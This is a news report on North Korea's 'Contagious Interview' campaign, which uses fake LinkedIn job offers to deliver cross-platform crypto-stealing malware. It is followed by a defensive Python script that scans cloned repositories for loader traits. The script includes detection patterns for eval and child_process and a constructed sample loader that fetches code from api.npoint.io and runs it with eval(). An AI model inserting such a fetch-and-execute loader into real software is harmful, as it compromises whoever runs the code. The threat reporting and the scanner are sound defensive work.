North Korean Hackers Deploy Multi-Platform Crypto Stealer Through Fake LinkedIn Jobs

North Korean Hackers Target Job Seekers with Sophisticated Multi-Platform Malware

The notorious Lazarus Group has launched a sophisticated cyber campaign targeting professionals through fake LinkedIn job opportunities in cryptocurrency and travel industries. The attack, capable of compromising Windows, macOS, and Linux systems, employs a multi-stage infection strategy.

The scam begins with attractive job offers promising remote-work flexibility and competitive compensation. Once candidates engage, the attackers request CVs and GitHub repository links to harvest personal information. The scheme progresses when the fraudulent recruiters share links to supposed decentralized exchange (DEX) project repositories on GitHub or Bitbucket.

The malware deployment occurs through:
– An obfuscated script retrieving payloads from api.npoint[.]io
– A cross-platform JavaScript information stealer targeting cryptocurrency wallet extensions
– A Python-based backdoor monitoring clipboard content and maintaining remote access

This campaign, identified as “Contagious Interview” (also known as DeceptiveDevelopment and DEV#POPPER), utilizes:
– BeaverTail: A JavaScript stealer
– InvisibleFerret: A Python implant
– A .NET binary capable of:
  – Establishing TOR proxy communications
  – Exfiltrating system information
  – Deploying cryptocurrency miners
  – Capturing keystrokes

The attack chain has been observed across LinkedIn and Reddit, with variations in approach, including requests to clone Web3 repositories or debug intentionally compromised code. The campaign continues to evolve, with attackers regularly modifying repository names and recruiter profiles to maintain effectiveness.
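The practical defence against both the infection chain above (an obfuscated script that fetches its payload from api.npoint[.]io) and the "clone this Web3 repository" lure is to triage a recruiter-supplied repository statically before anything in it is executed. The following is an added example written for this article, not code from the article, the researchers it summarizes, or any named tool. It walks a checkout and reports hard-coded URLs (api.npoint.io is the only payload host the article names; every other host is reported for review), dynamic code execution (`eval`, `new Function`, `exec`), and long opaque string literals typical of obfuscated loaders. The file extensions, the 200-character literal threshold, the keyword list and the sample loader are all constructed assumptions for illustration.

```python
"""Static triage of a recruiter-supplied repository before anything in it is run.

Added example, not from the article or any referenced tool. Heuristics target the
traits the article attributes to the loader; thresholds are assumptions.
"""
from __future__ import annotations

import os
import re
import tempfile
from dataclasses import dataclass
from urllib.parse import urlparse

# The one payload host the article names. Any other host is reported for review.
KNOWN_PAYLOAD_HOSTS = {"api.npoint.io"}

URL_RE = re.compile(r"https?://[^\s'\"`)<>]+")
DYNAMIC_EXEC_RE = re.compile(
    r"\beval\s*\(|\bnew\s+Function\s*\(|\bexec\s*\(|\bexecSync\s*\(|child_process"
)
# Long base64/hex-looking runs inside a string literal (200 chars is an assumed threshold).
OPAQUE_LITERAL_RE = re.compile(r"[\"'`]([A-Za-z0-9+/=]{200,})[\"'`]")
SCAN_EXTENSIONS = {".js", ".mjs", ".cjs", ".ts", ".py", ".json"}  # assumption


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    kind: str  # known_payload_host | outbound_url | dynamic_exec | opaque_literal
    detail: str


def scan_source(path: str, text: str) -> list[Finding]:
    """Scan one file's text and return every heuristic hit with its line number."""
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for url in URL_RE.findall(line):
            host = urlparse(url).hostname or ""
            kind = "known_payload_host" if host in KNOWN_PAYLOAD_HOSTS else "outbound_url"
            findings.append(Finding(path, lineno, kind, url))
        if DYNAMIC_EXEC_RE.search(line):
            findings.append(Finding(path, lineno, "dynamic_exec", line.strip()[:80]))
        for m in OPAQUE_LITERAL_RE.finditer(line):
            findings.append(Finding(path, lineno, "opaque_literal", f"{len(m.group(1))}-char literal"))
    return findings


def triage_repo(root: str) -> list[Finding]:
    """Walk a checkout (skipping node_modules/.git) and scan every source file."""
    findings: list[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in {"node_modules", ".git"}]
        for name in filenames:
            if os.path.splitext(name)[1] in SCAN_EXTENSIONS:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(os.path.relpath(full, root), fh.read()))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Fetch-from-known-host combined with eval/obfuscation is the loader pattern the
    article describes: 'high'. Any single trait alone only warrants a manual look."""
    kinds = {f.kind for f in findings}
    if "known_payload_host" in kinds and kinds & {"dynamic_exec", "opaque_literal"}:
        return "high"
    return "review" if kinds else "clean"


# Constructed samples (not real malware): a fetch-and-eval stub and a benign helper.
SAMPLE_LOADER = """\
const https = require("https");
const u = "https://api.npoint.io/EXAMPLE_ID";   // placeholder id, constructed
https.get(u, r => { let d = ""; r.on("data", c => d += c); r.on("end", () => eval(d)); });
"""
SAMPLE_BENIGN = """\
export function add(a, b) { return a + b; }
"""

if __name__ == "__main__":
    # Write the constructed samples into a throwaway "repository" and triage it.
    with tempfile.TemporaryDirectory() as repo:
        with open(os.path.join(repo, "index.js"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_LOADER)
        with open(os.path.join(repo, "util.js"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_BENIGN)
        hits = triage_repo(repo)
        for f in hits:
            print(f"{f.path}:{f.line} [{f.kind}] {f.detail}")
        print("verdict:", verdict(hits))
```

Run it against a fresh clone with `triage_repo("/path/to/checkout")` before opening the project in an IDE or running `npm install`; a "high" verdict means the repository contains exactly the fetch-and-execute trait described above and should be examined in an isolated VM, not on the workstation. The indicator set is deliberately small and taken from the article; extend `KNOWN_PAYLOAD_HOSTS` from your own threat-intel feed rather than guessing.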